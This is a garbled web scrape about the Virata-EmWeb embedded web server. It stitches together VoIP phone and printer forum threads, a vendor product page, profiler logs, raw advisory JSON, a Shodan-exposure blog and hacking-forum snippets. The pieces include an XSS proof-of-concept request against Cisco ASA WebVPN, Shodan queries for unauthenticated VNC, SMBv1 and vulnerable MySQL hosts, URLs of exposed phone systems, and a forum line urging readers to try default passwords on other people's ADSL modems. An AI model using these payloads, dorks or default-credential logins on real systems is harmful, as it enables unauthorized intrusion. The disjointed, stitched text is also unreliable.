If it is getting a 10.10.20.X IP address delete the phone entirely and rebuild it as it maybe a corrupt phone config file. emWeb supports both, POST and GET methods to receive form data from a client. I also found that enabling the trunking for VLAN 1 and 2 helped the phones be able to DHCP instead of having to be set static. For example the HP Color LaserJet 2800-series. I'll adjust the VLAN on port 3 as well and let you know. An example for this would be different printer models of the same product family that come with different host interfaces. Establish and maintain a vulnerability management program, RDP access must only be allowed using secure VPN or two-factor authentication, Update software and apply security patches on time, Migrate to the latest product version that is supported by the vendor. emWeb supports the following authentication mechanisms. The web server allows you to provide an operating system independent user interface (UI). Phone directories > then 9. Typical examples of devices that benefit from a browser UI are non-stationary like: Using SEGGER emUSB-Web technology it is possible to use emWeb without the need for anyTCP/IP stack. Exploit: It was possible to make the remote Virata-EmWeb/R6_0_3 server (the NBX Netset application) crash by running a standard nessus scan in safeChecks mode. Is that about right? # Author will be not responsible for any damage. Windows XP lost all support from Microsoft in April 2014. posted by andytmp to Technology (12 answers total) Well the server there is 'Virata EmWeb' which is an embedded server used in DSL modems, it seems. It is not currently accepting answers. Test Drive Lansweeper Yourself. I installed a new Server, and it is working fine. Advanced analytics technologies like ElasticSearch are also leaving an impact on the Indian IT scenario. The scenario hasnt changed much even after multiple remote code execution exploits reported on IIS 6.0 as recently as 2017. When sending a long header (long Other soft- and hardware isn't tested yet. Have these phones worked in the past with this 7100. Adopting cloud infrastructure like Azure and AWS is a super cool, cost-effective measure. Page 14 / 15 PCI Report. Recently, an ardent fan of Pewdiepie defaced more than 50,000 internet connected printers worldwide to help the YouTube vlogger encroach upon the top spot. Query: port:445 SMB Version:1 os:Windows !product:Samba country:in. member effort, documented in the book Google Hacking For Penetration Testers and popularised The easiest and probably most helpful is if you attach your config file. The worst ransomware of 2017 which affected more than 200,000 systems around 150 countries. If the phone can not find it's specific config it will boot up on a default config. \r\n\r\nThis security report can be copied and redistributed electronically provided it is not edited and is quoted\r\nin its entirety without written consent of SECNAP Network Security Corporation. As far as I know, this phone hasn't worked in I'm not sure how long. Re: BUG: After recent update new printers showing bad data . and other online repositories like GitHub, Test Drive Lansweeper Yourself. show examples of vulnerable web sites. Message was edited by: matt - removed sensitive information, Moved configuration to attached file. A client initiates a TCP connection to the Web server and sends a HTTP request. Along with this, Clearpass will load the already available profiling information(received earlier via other profiling methods used in Clearpass) for endpoint and will compare the best profiling method based on the reliability score of each of the fingerprint(highlighted in Red) received and will update the [Device Category/Device OS Family/Device Name] for endpoint. Resource Usage: The following table shows the approximate resource requirements for a typical web server configuration: Values measured in release mode with size optimization for a single task web server. Our aim is to serve 2020-06-11 11:32:56,089 DEBUG (8681) - - [11/Jun/2020 11:32:56] "POST /async_netd/deviceprofiler/endpoints HTTP/1.1" 200 130 0.001419, 2020-06-11 11:32:56,090 DEBUG Profile update mac:a08cfd617283 ip: hostname:None fp:{}, 2020-06-11 11:32:56,099 DEBUG Endpoint: {mac: a08cfd617283, ip:, static_ip:True, hostname: PI6773, mac_vendor: Hewlett Packard, device:
, other: , conflict:False, fp: {"host": {"services": ["80:http - Virata-EmWeb Version: 6.2.1"], "mac_vendor": ["Hewlett Packard"], "ports": ["80"]}, "snmp": {"sys_descr": "HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015", "name": "PI6773"}}, added_at: 2020-06-07 20:22:45.372636+03:00, updated_at: 2020-06-11 11:28:26.035262+03:00} loaded from tipslogdb, 2020-06-11 11:32:56,100 DEBUG Endpoint: {mac: a08cfd617283, ip:, static_ip:True, hostname: PI6773, mac_vendor: Hewlett Packard, device: , other: , conflict:False, fp: {"host": {"services": ["80:http - Virata-EmWeb Version: 6.2.1"], "mac_vendor": ["Hewlett Packard"], "ports": ["80"]}, "snmp": {"sys_descr": "HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015", "name": "PI6773"}}, added_at: 2020-06-07 20:22:45.372636+03:00, updated_at: 2020-06-11 11:28:26.035262+03:00} loaded from tipsdb, 2020-06-11 11:32:56,101 DEBUG Match ep:a08cfd617283 field: key:HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015 dev:HP Printer, 2020-06-11 11:32:56,101 DEBUG Best match ep:a08cfd617283 field: device: other:None, 2020-06-11 11:32:56,102 DEBUG Rule match {u'conditions': [[u'snmp.sys_descr', u'contains', u'HP']], u'combining_op': u'all'} attrs: {'hostname': u'PI6773', u'snmp': {u'sys_descr': u'HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015', u'name': u'PI6773'}, u'host': {u'services': [u'80:http - Virata-EmWeb Version: 6.2.1'], u'mac_vendor': [u'Hewlett Packard'], u'ports': [u'80']}, 'mac': u'a08cfd617283, 'device': , 'mac_vendor': u'Hewlett Packard'}, 2020-06-11 11:32:56,102 DEBUG Endpoint: a08cfd617283 profiled to , 2020-06-11 11:32:58,111 DEBUG Updated endpoints: [u'a08cfd617283] in tipsLogDb, 2020-06-11 11:32:58,139 DEBUG Updated endpoints: [u'a08cfd617283] in tipsdb. Note: Saftchecks mode only does web queries, XSS, etc.. Additional information or\r\npermission may be obtained by contacting SECNAP Network Security at 561-368-9561 or www.secnap.com\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "published": "2004-04-30T00:00:00", "modified": "2004-04-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6148", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:09", "viewCount": 5, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:3646"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": -0.4}, "_state": {"dependencies": 1678962117, "score": 1684015796, "affected_software_major_version": 0, "epss": 1679310407}, "_internal": {"score_hash": "45dca6f156c7b01657ddbae863c7beda"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}. The 3com NBX uses VXWORKS Embedded Real time Operating system and what appears to be Virata-EmWeb/R6_0_3 web server. Remember Wannacry? Log into CLI of the 7100 and go to enable mode. subsequently followed that link and indexed the sensitive information. For others, a credential brute-force attack or any simple exploit could result in successful unauthorized access to the system. Over the past few months we at K7 Threat Control Lab have identified a plethora of security vulnerabilities in Indian Cyberspace. Moreover, domestic port usage statistics explain that port 80 (used by default by plain HTTP) is far more in use in comparison to port 443 (used by default by HTTPS), meaning clear text transmission of user data over the internet can be easily eavesdropped upon by hackers (yes, we acknowledge the fact that there will be some HTTP port redirection to HTTPS). Many users still hate to tax their brain and so continue to pick terribly weak passwords like 123456 or QWERTY, and so on. Unlike AJAX, Server-Sent Events (SSE) are an HTML5 technique that allows a server to send data to the browser, without the browser permanently polling for data and therefore reducing unnecessary data overhead. The 3com NBX uses VXWORKS Embedded Real time Operating system and what appears to be Virata-EmWeb/R6_0_3 web server. Provide easy to use graphical interfaces to control your target. Figured I'd post in case someone recognizes it and can let me know. I have the phone configured properly, but it does not connect. Always use genuine software as a part of security best practice. Finally was an issue we hadn't noticed; that of the port 18 not being set to power inline never. Among others, HP printers count is at the top of the list. This question does not meet Stack Overflow guidelines. Google Hacking Database. Then go to phone and press menu button then 2. the fact that this was not a Google problem but rather the result of an often In example I see from the config port 3 is set with Voice VLAN on 1 instead of 2. Explore our interactive Demo or sign up for free 14-day trial. It is also used by each phone user to change speed dial\r\nnumbers, configure call forwarding and other features of their individual phone sets. emWeb allows you to use the most widely accepted language for providing Graphical User Interfaces in the world, HTML. Many Internet of Things (IoT) devices, such as printers, lack essential security features to protect them against cyber threats which, at times, makes them the weakest link to be exploited in the attack chain. The UI can be designed in a range from very basic/simple up to full replacements for traditional application GUIs, using technologies like . Apart from the data leak, there have also been a few ransomware incidents. Even targets that do not feature traditional network access via Ethernet cable or WiFi access can benefit by using a browser UI. Double checked the port and found it wasn't lit up. other online search engines such as Bing, # Author will be not responsible for any damage. compliant archive of public exploits and corresponding vulnerable software, Attackers are using such OSINT techniques to identify targets with known, common security loopholes, to infiltrate into the network and carry out malware infections. Virtual files allow to deliver complete pages that are built when they are requested. \r\n\r\nExploit: It was possible to make the remote Virata-EmWeb/R6_0_3 server (the NBX Netset application) crash\r\nby running a standard nessus scan in safeChecks mode. World rights reserved. Fake OS X Apps using EmPyre: Beware Mac Users! After nearly a decade of hard work by the community, Johnny turned the GHDB actionable data right away. Below is a snippet from profiler logs for reference: 2020-06-11 11:22:05,093 DEBUG (8681) - - [11/Jun/2020 11:22:05] "POST /async_netd/deviceprofiler/endpoints HTTP/1.1" 200 130 0.001424, 2020-06-11 11:22:05,094 DEBUG Profile update mac:a08cfd617283 ip: hostname:None fp:{u'host': {u'services': [u'80:http - Virata-EmWeb Version: 6.2.1'], u'user_agent': u'', u'ports': [u'80']}}, 2020-06-11 11:22:05,104 DEBUG Endpoint: {mac: a08cfd617283, ip:, static_ip:True, hostname: PI6773, mac_vendor: Hewlett Packard, device: , other: , conflict:False, fp: {"host": {"services": ["2000:cisco-sccp", "5060:sip"], "mac_vendor": ["Hewlett Packard"], "ports": ["2000", "5060"]}, "snmp": {"sys_descr": "HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015", "name": "PI6773"}}, added_at: 2020-06-07 20:22:45.372636+03:00, updated_at: 2020-06-11 11:11:05.412040+03:00} loaded from tipslogdb, 2020-06-11 11:22:05,105 DEBUG Endpoint: {mac: a08cfd617283, ip:, static_ip:True, hostname: PI6773, mac_vendor: Hewlett Packard, device: , other: , conflict:False, fp: {"host": {"services": ["2000:cisco-sccp", "5060:sip"], "mac_vendor": ["Hewlett Packard"], "ports": ["2000", "5060"]}, "snmp": {"sys_descr": "HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015", "name": "PI6773"}}, added_at: 2020-06-07 20:22:45.372636+03:00, updated_at: 2020-06-11 11:11:05.412040+03:00} loaded from tipsdb, 2020-06-11 11:22:05,106 DEBUG Match ep:a08cfd617283 field: key:HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015 dev:HP Printer, 2020-06-11 11:22:05,106 DEBUG Best match ep:a08cfd617283 field: device: other:None, 2020-06-11 11:22:05,106 DEBUG Rule match {u'conditions': [[u'snmp.sys_descr', u'contains', u'HP']], u'combining_op': u'all'} attrs: {'hostname': u'PI6773', u'snmp': {u'sys_descr': u'HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD153,EEPROM JSI23700101,CIDATE 12/10/2015', u'name': u'PI6773'}, u'host': {u'services': [u'80:http - Virata-EmWeb Version: 6.2.1'], u'mac_vendor': [u'Hewlett Packard'], u'ports': [u'80']}, 'mac': u'a08cfd617283, 'device': , 'mac_vendor': u'Hewlett Packard'}, 2020-06-11 11:22:05,106 DEBUG Endpoint: a08cfd617283 profiled to , 2020-06-11 11:22:07,117 DEBUG Updated endpoints: [u'a08cfd617283] in tipsLogDb, 2020-06-11 11:22:07,142 DEBUG Updated endpoints: [u'a08cfd617283] in tipsdb. Labels: Labels: Archive; 0 Kudos Share Reply. Using Windows XP is a high risk even if the system is in the internal network as malware can pivot to internal networks from other connected infected computers. Edited by: hiattech. Organizations need to identify such weak or less-secured endpoints and ensure they have controls in place to mitigate any attack. Whenever the page is processed by emWeb, the placeholder will be exchanged for the output of a custom application code. The Digest Authentication scheme uses an MD5 based challenge/response handshake including nonce data. OK, sorry for the delay. The vulnerabilities discussed in this blog provide easy ways for an attacker to gain access to critical systems or user databases resulting in financial and other confidential data leakage and loss. general (0/tcp) Info. Also note, that with the\r\nproliferation of web based attacks on the net lately, and the fact that the nessus tests are just a 'safe'\r\nversion of these exploits, thi!\r\n s creates a serious problem for the NBX.\r\n\r\nAlso note, that the NBX is NOT SIP, but rather uses 3com proprietary multi-cast protocol, an enterprise\r\nthat deploys the 3com VOIP NBX system and expects to use the functions on a remote phone must either use a\r\nMulticast VPN router (rare and expensive), or place the NBX on the outside of the firewall. The following devices already use browser UIs for configuration purposes: Printers are a popular examples for devices that already use a browser UI for configuration, at least if they support a network interface like Ethernet or WiFi anyhow. Telnet or SSH into theCLI of 7100 not serial and enter, make sure your buffer on your terminal program is set high: From the 712 phone, go to menu > 2> 9 and then select the factory button. Nmap scan report for 10.240..107 Host is up(0.0026s latency). this web server is used by the NetSet configuration program to update/reboot/backup/configure and check status on the 3com NBX VPIO call manager. This question appears to be off-topic because it lacks sufficient information to diagnose the problem. 3com has known since at\r\nleast October 2002 when we informed them of the security problems with the built in ftp server. I managed to get the other 2 phones back online; all they needed was the IP config (basic network settings) put in again and they picked right up. Based on your configuration the phone should get DHCP from the 7100 and receive a VLAN 2 IP Address of 10.10.20.X. As discussed in a previous K7 blog, such oversights increase susceptibility to security incidents like data loss and malware/ransomware infections on systems/networks. Most likely there was a database problem on my end causing the problem. {"id": "SECURITYVULNS:DOC:6148", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "[Full-Disclosure] 3com NBX VOIP NetSet Denial of Service Attack", "description": "Systems: 3com NBX IP VOIP NetSet(r) Configuration Manager\r\nSeverity: Serious \r\nCategory: Denial of Service \r\nClassification: Insufficient user input checking\r\nBugTraq-ID: TBD\r\nCERT VU#: TBD\r\nCVE ID: TBD\r\nVendor URL: www.3com.com\r\nAuthor: Michael S. Scheidell, SECNAP Network Security Corporation\r\nOriginal Release date: April 20, 2004\r\nNotifications: 3com Notified via email April 20, 2004, no response\r\nLast contact with 3com: NA\r\n\r\nDiscussion: From 3com's web site:\r\n\r\n3Com\u00ae SuperStack\u00ae 3 NBX\u00ae and 3Com NBX 100 networked telephony solutions offer wide-ranging\r\nprice/performance alternatives to fit your business needs today and tomorrow. Note: you may still be able\r\nto connect a 9600 baud terminal to the 3com NBX Call Manager and soft boot system, but this requires\r\nphysical access and would need to be done each and every time someone ran nessus. Through a query we found 123 printers are still directly reachable over the internet (Figure 9). . For example the HP Color LaserJet 2800-series. I have looked at documentation for both the server and the phone but they are very general. Thanks for all the help. I just updated to the most recent version. Query: Server: Virata-EmWeb/R6_2_1 country:in. I'm pretty sure that phone is on that port. The phone as acting like it wasn't even seeing an FTP server which I thought was very strange. [Review] 100 Things You Need to Know About Microso [TUT] Destroyed Pass Win XP Using Flash Disk. First, the port being on the wrong VLAN was part of the problem. User: admin / 2011-07-19 11:46:02. Note: Saftchecks mode only does web queries, XSS, etc.. an extension of the Exploit Database. non-profit project that is provided as a public service by OffSec. On your uplink port you do not have VLAN 2 enabled so if the other users are connecting off another switch it looks like you need to add VLAN 2 to the allowed VLAN list on port Gig 0/2 also make sure and edit port 3 to have a voice VLAN 2 instead of 1. emWeb allows you to use the most widely accepted language for providing Graphical User Interfaces in the world, HTML. I'll get the config file shortly and post it here shortly. Figuring out the root causes behind such perilous attacks revealed a few interesting statistics (many thanks to Open Source Intelligence aka OSINT). Greetings, A couple of days ago updating my blog for the beauty of non secure dsl modems in the .gr domain, i notice that beauty is extented beyond that domain. His initial efforts were amplified by countless hours of community Yes, 'Authentication disabled' means a remote user can directly connect to the service and enter the network without requiring any authentication. Please re-open if not. The debug dhcp command has changed so it might be different if you have older firmware. That is the easiest way to attach a file to a post. \r\n\r\nA company who uses the VoIP features for remote locations, and who has the call manager located on the\r\noutside of their firewall, or has no firewall can have their VOIP management functions disrupted easily.\r\nEven if the company has call manager located on internal network, people with internal network access can\r\nalso disrupt communications. The Google Hacking Database (GHDB) Another major factor that still provides an easy target for malware infections in both consumer and business segments is the use of pirated or cracked OS and software, downloaded from 3rd party sites or torrents which are known to carry bundled malware with them. easy-to-navigate database. But in reality, unfortunately, there are roughly 18,000 devices in India with SMB v1 ports still exposed online (Figure 6). Due to the fact that a browser UI is operating system independent, it makes a great alternative for any kind of application GUI. [Tutorial] Intel Pentium 5. out now!!!! The biggest advantage, of course, is that you can operate the target from any host that features a browser, independent of the operating system. This is done to prevent any false positives (if profiling information for actual endpoint is not received for some reason [like port 161 being blocked unintentionally if subnet scan is used]). Config looks ok. I have also posted the DeviceTester.exe results from doing it on both of these printers. Could you contact us at support@lansweeper.com and provide us with screenshots of the following: Re: BUG: After recent update new printers showing BUG: After recent update new printers showing bad data, Re: BUG: After recent update new printers showing bad data. I don't think the phones DHCP to the server because it's on VLAN2 but I'm not sure if it should still find the network. Gardner, MA 01440, USAus-east@segger.com There were two other phones that quit working after a power outage but them came back up. Query: product:MySQL country:in version:5.1.53-community-log. No way to change the default port to 'hide' this vulnerable\r\nserver. Requirement 12: Maintain an Information Security . Searching for a similar pattern, we were able to get 696 default Apache server manager portals exposed to the internet (Figure 7). There were a couple right answers. Query: "Authentication disabled" country:"in" product:"VNC" Figure 4: VNC with disabled authentication (Shodan) Lets move on to the next important security issue, remote administration. When i ran the debug for dhcp, i got "ambiguous command". . Figure 17 shows one such ransomware incidents we have observed through our intelligence feeds. When sending a long header (long. Ecolab-Allee 5 40789 Monheim am Rhein, Germanyinfo@segger.com Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type. This repository has been archived by the owner on Nov 28, 2022. Akira Ransomware Unleashing Chaos using Conti Leaks, Encrypted Chaos: Analysis of Crytox Ransomware, 700,000 records of American Express India customers were leaked. Apparently, the line was plugged into 18 which gave it power, but nothing else. The typically used protocol version is still 1.1 that gets extended by various sub-protocols. Describe your problem in more detail or include a minimal example in the question itself. No port for an ssh connect was found open. Around the world, more than a million users data has been leaked due to improperly-configured or exposed sensitive keys on these servers. Q: How does profiling conflict work in Clearpass when fingerprint information for an endpoint is received and when no fingerprint information is received for an already profiled endpoint : +1-408-767-4068. UIs designed this way can also be easily integrated into other application. When sending a long header (long filename), the printer will reboot. Vulnerability Details : CVE-2006-0248 Virata-EmWeb web server 6_1_0, as used in (1) Intracom JetSpeed 500 and 520 and (2) Allied Data Technologies CopperJet 811 RouterPlus, allows remote attackers to access privileged information, such as user lists and configuration settings, via direct HTTP requests. I'm not sure if this specific phone has ever been configured with this system, but the same model has worked fine. Tel. Indian organizations are quite competent in utilizing new technologies for scaling their business efficiently. and ports throughout the country. Few notorious vulnerabilities in cloud services are subdomain takeover, bucket listing and improper permissions for the objects. Description Virata-EmWeb web server 6_1_0, as used in (1) Intracom JetSpeed 500 and 520 and (2) Allied Data Technologies CopperJet 811 RouterPlus, allows remote attackers to access privileged information, such as user lists and configuration settings, via direct HTTP requests. Figure 2 below displays the exact count of exposed HTTP and HTTPS ports in India. However, this bucket list doesnt specify the users origin, but might consist of Indian users as well. But using these with default settings is not. compliant. This makes the software a part of the equipment expenses, keeping the costs static. For the unacquainted, HTTPS piggybacks upon HTTP entirely on top of TLS to encrypt the HTTP traffic. Using a browser based UI is not exclusive to an external device being accessed. The ASUS connects to the modem. The data is included in the body of the request. this information was never meant to be made public but due to any number of factors this to a foolish or inept person as revealed by Google. This was closed before I could respond to clarify. # This was written for educational purpose. I'm hoping/guessing that if I set that 1) if I set that VLAN on the port to 2, it'll connect and 2) if I turn on the trunking for VLAN 1 and 2 on the gigabit port, that, in theory, the phones should connect and pick up their configurations on their own from this point out. An OSINT website grayhatwarefare.com has listed the number of AWS buckets that it was able to crawl and the number of files available in each of them (Figure 15). You signed in with another tab or window. Johnny coined the term Googledork to refer If you are on the list too, we recommend enabling SSL/TLS on your web server immediately. the most comprehensive collection of exploits gathered through direct submissions, mailing While it is insecure by its design, it is still in use as SSL/TLS security in modern applications strengthen the underlying layers. Now, when I scanned for Devices, it found some Printers, but the information it pulled was skewed. With the IP-over-USB technology, SEGGER provides a state-of-the-art solution for USB devices to be powered by a browser UI. The computers and the phones all connect directly to the 7100, and the 7100 connects to the ASUS for DHCP. Adversaries brute-force credentials for Apache server manager logins and upload a web shell to gain and maintain access to server resources post a successful attack. : +1-978-874-0299 {"id": "SECURITYVULNS:DOC:21563", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Cisco ASA5520 Web VPN Host Header XSS", "description": "- Cisco ASA5520 Web VPN Host Header XSS\r\n\r\n- Description\r\n\r\nCross-site scripting.\r\n\r\n- Product\r\n\r\nCisco, ASA5520, IOS 7.2(2)22\r\n\r\n- PoC\r\n\r\nModified request:\r\n\r\nPOST /+webvpn+/index.html HTTP/1.1\r\nHost: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""\r\ncontent='"www.owasp.org\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,\r\napplication/x-shockwave-flash, application/vnd.ms-excel,\r\napplication/vnd.ms-powerpoint, application/msword, */*\r\nReferer:\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nUA-CPU: x86\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: webvpnlogin=1\r\nContent-Length: 66\r\n\r\nusername=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=\r\n\r\n\r\nResponse:\r\n\r\nHTTP/1.1 200 OK\r\nServer: Virata-EmWeb/R6_2_0\r\nContent-Type: text/html\r\nCache-Control: max-age=0\r\nSet-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/\r\nSet-Cookie: webvpnlogin=1\r\nContent-Length: 5556\r\n\r\n<html>\r\n<!--\r\n Copyright (c) 2004, 2005 by Cisco Systems, Inc.\r\n All rights reserved.\r\n -->\r\n<head>\r\n\r\n\r\n<META http-equiv="PICS-Label" content='(PICS-1.1\r\n"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North\r\nAmerica Server" for\r\n"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""\r\ncontent='"www.owasp.org/+webvpn+/index.html" on\r\n"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>\r\n\r\n<meta http-equiv="Window-target" content="_top">\r\n<title>WebVPN Service</title>\r\n\r\n\r\n- Solution\r\n\r\nNone\r\n\r\n- Timeline\r\n\r\n2007-09-17: Vulnerability Discovered\r\n2008-02-15: Disclosed to Vendor (auto-reply)\r\n2009-04-02: Disclosed to Public (XSS is so 1999)\r\n\r\n-- \r\n\r\nBugsNotHugs\r\nShared Vulnerability Disclosure Account", "published": "2009-04-01T00:00:00", "modified": "2009-04-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21563", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:29", "viewCount": 98, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 0.1}, "_state": {"dependencies": 1678962117, "score": 1684016453, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "edcc7853c853ba70994d021ec8b073be"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}. EXAMPLE.. : OK. Now we must trying default password from every modem : Example admin : admin admin : password admin . Product Cisco, ASA5520, IOS 7.2(2)22 PoC Modified request: POST /+webvpn+/index.html HTTP/1.1 . By clicking Accept, you consent to the use of cookies. One model might come with USB only while another model features USB, Ethernet cable and WiFi. * Applies to second seat/product and all additional seats/products of the Single Product License and Single Developer License. So finally, after all the reconfiguring and such, I got fed up and decided to try the port directly. : +86-133-619-907-60, emWeb Web Server to Control Target with Graphical Interfaces. emWeb supports different techniques to create dynamic pages. [Tutorial] THE ULTIMATE BEGINNER'S GUIDE TO HACKIN [Tutorial] Hacking Password Protected Website's. One more question: can I get some clarification on this? Exploit: It was possible to make the remote Virata-EmWeb/R6_0_3 server (the NBX Netset application) crash by running a standard nessus scan in safeChecks mode. We found 2,947 systems still hosting MySQL Community Edition 5.1.53 which is vulnerable to a number of remote code execution bugs (Figure 11). Let me know which users are having the problem. SSE works by the browser subscribing to the Web server and keeping the connection up for further data sent. Make sure you remove any passwords if in clear text. Moving to database technologies, MySQL is still one of the most popular open-source databases around the world. If any phones are connected to the ASUSTek then it will need to do VLANing and have VLAN 2 enabled on the port that connects to the 7100 and also any port the phones are connected to. The development of HTTP is coordinated by the IETF (Internet Engineering Task Force) and the W3C (World Wide Web Consortium). The Exploit Database is a CVE The Virata EmWeb software is embedded in multiple printers and DSL modems. A visitor counter in a page with static content would be one of the simplest use cases. The sample can easily be modified to fit your needs. When sending a long header (long. Requirement 12. from: 2011-06-19 to: 2011-07-19. Investing in various security products has proven helpful in defending against cyber threats over time but these efforts may be futile if organizations fail to follow security best practices designed to safeguard them. Despite HTTPS being available for almost two decades, many web servers still prefer HTTP, thus exposing users data to unauthorized access. A little over a month after this, however, many users still seem unaware of the risks. Samba is a software suite that gives Linux ability to interact using the SMB protocol. HTTP server: Virata-EmWeb/R6_2_1 HTTP title: HTTPS port is open HTTPS error: The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel. Most printers at least specify the brand and sometimes model in the main http tittle, [re-opened] Device names needed on main view, Re: [re-opened] Device names needed on main view, LsAgent on Ubuntu 18.04 - Not getting updated in the console, A report showing all of the switches and their configured ports along with vlan data, "Exception" or "Exclusion" in Default Report. In most cases, Here's the boot scenario: Phone looks for DHCP Option 157 to get the information needed to connect to 7100 to download config file, Phone receives Option 157 and sees it should use VLAN 2, Phone gets information on where to download it's config file. Tel. that provides various Information Security Certifications as well as high end penetration testing services. Virata EmWeb R6.0.1 Denial Of Service. There are currently 4 working phones. But people have remained the same, boring and predictable. Upcoming Keynote Event - Introducing Lansweeper's 2023 Spring Release: 'Duvel' - Learn More. A quick google search will find several 3com nbx systems with the Call\r\nmanager exposed.\r\n\r\nhttp://ipphone.cybertown.co.at/\r\nhttp://telephone.michiganaerospace.com/\r\nhttp://nbxss3.shoreschool.org/\r\n\r\nThis condition is not recovered without a Hard reboot (power off/on). We couldnt contact the resource owners as the contact details are not readily available. The Exploit Database is maintained by OffSec, an information security training company In recent months, variants of Dharma & SamSam ransomware have been spotted in the wild using RDP brute-force attacks on weak credentials to get an initial foothold into the system. SIP port 5060 is closed HP jetdirect port 9100 is open SSH port 22 is closed Scanning done! and here is the device tester putput for the printers that don't have an assigne dname but do have a http page title: Oops, spoke to soon, I have 18 devices (equitraq printing release stations) that have the http tittle "Equitrac web admin" but only list as their respective IP's in the list. Today, the GHDB includes searches for Query: Authentication disabled country:in product:VNC. 90022. : +49-2173-99312-0 Fax: +49-2173-99312-28, Boston area Yeah I noticed the voice vlan 2, that is why I asked him to see what port the phone was plugged into. HTTP is a communication protocol originally designed to transfer information via hypertext pages. emWeb is available under various Embedded Software License models and delivered in source code packages. information and dorks were included with may web application vulnerability releases to By using more detailed queries on Shodan, we were able to identify servers with authentication disabled for VNC (Figure 4), SMB (Figure 5) and Jetty services. Tel. OK lets began may be all of you can login to once of costumer ADSL modem which is their default password doesnt changed, [tutorial] How to entering another modem connection. Avoid unsupported software versions for any reason, Properly configure any server, cloud or other infrastructure (like printers or databases) with security and data as the primary goals. Since the 3com nbx is based on an\r\nembedded Unix operating system (vxworks), an abrupt power off could cause loss of data, including corruption\r\nof voice mails in progress or logs. How to Reset Your Virata Router Password To Default Settings If none of the passwords below work for you then you have 2 options: Either try to recover your router's password with Network Utilities Find Password Or Reset your Virata router Please only reset your router as a last resort. If you are using other switches ensure the port the phone is connected to is trunked on VLAN 1 and VLAN 2, then make sure the upstream switch ports are trunked on both VLANS as well as the 7100 port. The Common Gateway Interface (CGI) is a replace mechanism that is used in conjunction with a template page. ndpoint: a08cfd617283 profiled to . An easy to use application API allows to retrieve and process form data in a simple and memory efficient way. producing different, yet equally valuable results. By the way I took a closer look at the supplied config and see you have 6 SIP users but only see 4 properly configured voice ports on the 7100 port 1 and 2 and ports 4 and 5. So I took the phone back to the desk and was back to the same problem. Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type. To request data, with AJAX the browser needs to poll for data. If you are using other switches ensure the port the phone is connected to is trunked on VLAN 1 and VLAN 2, then make sure the upstream switch ports are trunked on both VLANS as well as the 7100 port. Even in India most of the organizations use MySQL since it is deemed cost-effective and efficient. 2 other phones lost their network configurations during a power outage and I had to manually reprogram them but they picked right up. Virata-EmWeb DSL modems. 133 Xiulian Road Does anyone have experience with this that they might give me some ideas on what I need to do on the phone or server end to register the IP/Phone with the server? Check the Access Method column to make sure your access method is correct, then try the given default username and password. Endpoint: a08cfd617283 profiled to . Should I try to put in the DNS and gateway so it can try? It is optimized for emNet, but any RFC-compliant TCP/IP stack can be used. We don't have any other adtran switches, but we do use an ASUSTek RT-N66W for the DHCP, VPN, and WiFi. The password is never sent in clear text, which makes it a good choice in case a lightweight and secure authentication is required where SSL/TLS is not possible. In addition since you have another device handing out DHCP you will want to configure as well with DHCP option 157 like in the Adtran config supplying the proper user name and passwords: option 157 ascii TftpServers=,FtpServers=,FtpLogin=<>,FtpPassword=<>,Layer2Tagging=True,VlanID=2. 57 million US citizens data was leaked very recently through an exposed ES server as it was misconfigured for public access. Or alternatively you could manually configure the phones with the VLAN 2 VLAN ID. AJAX is an acronym for Asynchronous 